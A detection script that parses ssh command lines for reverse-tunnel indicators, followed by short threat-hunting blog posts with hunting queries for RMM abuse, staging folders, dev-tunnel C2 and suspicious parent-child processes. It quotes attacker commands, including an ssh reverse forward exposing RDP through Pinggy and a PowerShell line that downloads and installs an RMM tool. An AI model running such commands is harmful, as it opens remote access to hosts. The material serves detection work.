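import shlex

TUNNEL_SERVICE_DOMAINS = ("pinggy.io", "pinggy.link")
SENSITIVE_LOCAL_PORTS = {3389: "rdp", 22: "ssh", 445: "smb", 5985: "winrm"}
OPTS_WITH_ARG = set("BbcDEeFIiJLlmOopQRSWw")  # OpenSSH ssh(1) options that take a value

def parse_forward(spec):
    """'[bind_address:]port:host:hostport' -> dict (the colon form only)."""
    parts = spec.split(":")
    if len(parts) == 3:
        parts = [""] + parts
    if len(parts) != 4:
        raise ValueError(f"unsupported forward spec {spec!r}")
    bind, port, host, hostport = parts
    return {"bind": bind, "remote_port": int(port), "local_host": host, "local_port": int(hostport)}

def parse_ssh(cmdline):
    argv = shlex.split(cmdline)
    info = {"port": 22, "forwards": [], "options": {}, "flags": [], "destination": None}
    i = 1
    while i < len(argv):
        arg = argv[i]
        i += 1
        if not arg.startswith("-") or arg == "-":
            if info["destination"] is None:
                info["destination"] = arg   # first bare word is [user@]host
            continue                        # later words are the remote command
        flag, value = arg[1], arg[2:]
        if flag not in OPTS_WITH_ARG:
            info["flags"].extend(arg[1:])   # e.g. -N, -f, -fN
            continue
        if not value:                       # value given as the next word (-p 443)
            value, i = argv[i], i + 1
        if flag == "p":
            info["port"] = int(value)
        elif flag == "R":
            info["forwards"].append(parse_forward(value))
        elif flag == "o":
            key, _, val = value.partition("=")
            info["options"][key.strip()] = val.strip()
    return info

def tunnel_indicators(info):
    found = []
    dest_host = (info["destination"] or "").rpartition("@")[2].lower()
    if any(dest_host == d or dest_host.endswith("." + d) for d in TUNNEL_SERVICE_DOMAINS):
        found.append("tunnel_service_destination")
    if "+tcp@" in (info["destination"] or ""):
        found.append("token_and_type_in_username")  # as in the post: <token>+tcp@a.pinggy.io
    for fw in info["forwards"]:
        if fw["local_port"] in SENSITIVE_LOCAL_PORTS:
            found.append("reverse_forward_" + SENSITIVE_LOCAL_PORTS[fw["local_port"]])
    if info["options"].get("StrictHostKeyChecking", "").lower() == "no":
        found.append("host_key_checking_disabled")
    if info["port"] == 443:
        found.append("ssh_over_443")  # SSH on the HTTPS port blends into egress filtering
    return found

PINGGY_CMDLINE = ("ssh -p 443 -R0:127.0.0.1:3389 -o StrictHostKeyChecking=no "
                  "-o ServerAliveInterval=30 4FohZ817ZPe+tcp@a.pinggy.io")  # from the post
BENIGN_CMDLINE = "ssh -i ~/.ssh/id_ed25519 -L 8080:localhost:80 admin@bastion.example.com"  # constructed
```

Because the forward spec is parsed rather than string-matched, the same logic flags a reverse forward of 3389 to any tunnelling service once its domain is added to `TUNNEL_SERVICE_DOMAINS`, which is the natural extension of the post's Pinggy-specific query.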

185. Using Process Parent and Children Relationships for Detection and Hunting

Hello everyone! Today we're going to talk about some basics. But such basics are extremely important to document and use. I'm talking about process parent and child relationships. The thing is, some processes may rarely or never spawn certain other processes in a legitimate way. So if you see such a behaviour marker, it's most likely related to malicious activity. But the problem is that there can be many, many variants of such markers. Let's look at an example, which belongs to Kimsuky. It's a malicious VBS file. If we look at it closely, we can see that in this case wscript.exe spawns curl.exe to download another malicious file. And this is an example of a behavior marker we can use for detection or hunting:

event_type: "processcreatewin" AND proc_p_file_path: "wscript.exe" AND proc_file_path: "curl.exe"

And yes, as I mentioned before, there can be many variants of such behaviour markers, so make sure to document them! See you tomorrow!

184. Ransomware Gangs Abuse PowerShell to Install Level RMM

Hello everyone! RMMs. Yes, again. This one isn't new, but I don't see it often enough, so I decided to share some detection and hunting ideas for it. I'm talking about Level RMM. According to this report, the adversary leveraged PowerShell to download the installer:

powershell $env:LEVEL_API_KEY = <API Key>; Set-ExecutionPolicy RemoteSigned -Scope Process -Force; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; $tempFile = Join-Path ([System.IO.Path]::GetTempPath()) "install_windows.exe"; Invoke-WebRequest -Uri "hxxps://downloads[.]level[.]io/install_windows.exe" -OutFile $tempFile;

The executable is signed by Level Software, Inc. Why not use it for detection?

event_type: "processcreatewin" AND proc_file_sig: "Level Software"

Another detection opportunity is searching for Level RMM-related domains:

event_type: "dnsreqwin" AND dns_rname: ("level.io" OR "rmm.dev")

See you to...

183. Using Staging Folders For Threat Hunting

Hello everyone! Adversaries often use multiple stages to deliver the final payload or, for example, some tools. In some cases they use very special folders, and we can use such paths in our threat hunting missions. Want an example? Sure! Let's look at this DCRAT campaign. According to the report, the adversary downloaded the final payload to C:\Users\Public\Downloads. Quite an interesting folder, isn't it? Yes, we can build a hunting query using this information:

event_type: "processcreatewin" AND proc_file_path: "Public\\Downloads"

Do you know any interesting staging folders? See you tomorrow!

182. Adversaries Abuse Microsoft Dev Tunnels for C2

Hello everyone! We've talked a lot about abusing legitimate services for C2 channels. Let's look at another example worth a hunting query! According to this report, the adversary leveraged malicious Word documents to deliver a Havoc Demon. An interesting thing here is that the threat actor decided to use Microsoft dev tunnels for C2. Dev tunnels allow developers to share local web services across the internet securely. As you can see, not only developers. In this case the following domain was used: hxxp://djlmwd9b-80.euw.devtunnels[.]ms. And we can use it to build a query:

event_type: "dnsreqwin" AND dns_rname: "devtunnels.ms"

Other domains to consider:

app.github.dev
tunnels-prod-rel-tm.trafficmanager.net
global.rel.tunnels.api.visualstudio.com

See you tomorrow!